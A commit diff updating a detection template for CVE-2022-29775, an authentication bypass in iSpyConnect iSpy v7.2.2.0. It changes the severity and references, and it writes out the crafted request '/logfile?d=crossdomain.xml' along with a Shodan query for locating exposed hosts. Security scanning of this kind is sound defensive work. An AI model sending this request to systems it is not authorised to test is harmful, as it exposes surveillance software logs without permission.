Update CVE-2022-29775.yaml

2022-09-15 07:12:13 +05:30 · 2022-09-15 07:12:13 +05:30 · b3bd2f20b6
parent c996db29ba
commit b3bd2f20b6
1 changed files with 22 additions and 14 deletions
--- a/cves/2022/CVE-2022-29775.yaml
+++ b/cves/2022/CVE-2022-29775.yaml
@ -1,32 +1,40 @@
 id: CVE-2022-29775

 info:
-  name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication.
+  name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication
  author: arafatansari
-  severity: critical
+  severity: low
  description: |
    iSpyConnect iSpy v7.2.2.0 allows attackers to bypass authentication via a crafted URL.
  reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29775
+    - https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b
    - https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29775
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775
  metadata:
-    shodan-query: http.html:"Phpjabbers"
    verified: true
-  tags: improper,authentication,cve,2022
+    shodan-query: http.html:"iSpy is running"
+  tags: cve,cve2022,ispy

 requests:
-  - raw:
-      - |
-        GET /logfile?d=crossdomain.xml HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - '{{BaseURL}}/logfile?d=crossdomain.xml'

    matchers-condition: and
    matchers:
+      - type: word
+        part: body
+        words:
+          - 'SERVER: Log Start'
+          - 'Log File'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
      - type: status
        status:
          - 200
-
-      - type: word
-        words:
-          - 'Log File'
-          - '<title>iSpy v7.2.1.0 Log File</title>'